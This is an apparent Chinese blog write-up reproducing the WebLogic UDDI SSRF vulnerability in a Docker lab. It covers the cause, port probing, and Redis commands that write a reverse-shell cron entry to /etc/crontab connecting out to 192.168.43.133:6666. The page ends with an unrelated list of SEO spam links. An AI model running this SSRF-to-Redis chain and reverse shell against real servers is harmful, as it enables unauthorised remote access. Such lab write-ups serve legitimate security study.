当前位置: 首页 > wzjs >正文

大气自适应网站源码百度站长资源

大气自适应网站源码,百度站长资源,三门峡做网站,深圳市宝安建设工程交易中心漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 漏洞形成原因: WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicR…

漏洞概述:

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞形成原因:

WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicRegistries.jsp 文件。该文件允许用户输入外部 URL,但未对输入的 URL 进行严格的过滤和验证,导致攻击者可以利用此功能发起任意 HTTP 请求

影响范围:

weblogic 版本10.0.2--10.3.6

复现

1,访问7001这样就是搭建成功了

2,在url处访问ip:7001/uddiexplorer/,可查看uddiexplorer应用

3,漏洞位置存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp,在表单中随意输入内容使用burp抓包,发送到重放模块

4,可以看到数据包有一个url,我们通过更改进行测试

5, 当访问一个可用端口时,会收到一个带有状态码的错误响应。如果访问的是非HTTP协议,则会返回"did not have a valid SOAP content-type"错误。

6,当访问一个不存在的端口时,响应会显示"could not connect over HTTP to server"。

7, 我们通过命令进入容器里面获取ip地址

docker exec -it 32da04e35583 /bin/bash

netstat -tuln

8,然后通过ssrf探测端口,发现了6379,存在redis未授权, 将反弹 shell 的脚本写入目录/etc/crontab(这个目录下是一个默认自动执行的一些 crontab 定时服务命令,里面都写的是一些开启服务的命令)

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/192.168.43.133/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

http://www.dtcms.com/wzjs/317896.html

相关文章:

  • 焦作网站建设seo企业推广案例
  • 德州市市政工程建设总公司网站今日头条最新
  • 如何建设网站 企业爱站关键词挖掘软件
  • 企业建设营销网站的基本步骤网站改版
  • 黑群晖可以做网站吗微信软文
  • 网页设计代写价格关键词优化的主要工具
  • 内江网站怎么做seo给公司做网站要多少钱
  • 启明星网站建设顾问
  • 外贸网站源代码辅导机构
  • 中国兰州网兰州频道广州seo招聘网
  • 毕业设计 旅游网站建设搜索seo神器
  • 做网站外包公司论坛推广怎么做
  • 用jsp做网站的难点下载百度搜索
  • 长宁区网站建设公司手机百度官网
  • 建设商场黄金网站百度推广一年大概多少钱
  • 做网站的钱付款用途写什么网红推广接单平台
  • 人才招聘网官网入口关键词优化公司前十排名
  • 网站后台这么做竞价推广外包托管
  • 长春百度推广哪家好深圳搜索引擎优化推广便宜
  • 厦门 外贸公司做网站重庆疫情最新消息
  • 怎么创建网站平台赚钱网络营销推广有哪些方法
  • 唐山公司网站建设项目平台
  • 淘客怎么做网站推广武汉seo优化分析
  • 网站网络推广优化手机seo关键词优化
  • 网站建站基础优化网站搜索
  • 拼多多网页设计尺寸宁波seo关键词优化方法
  • 阿里云服务器责任怎么做网站最好的小说网站排名
  • 企业网站自己可以做网站模板免费下载
  • 信息网站模板有没有专门做营销的公司
  • wordpress 提速插件搜索优化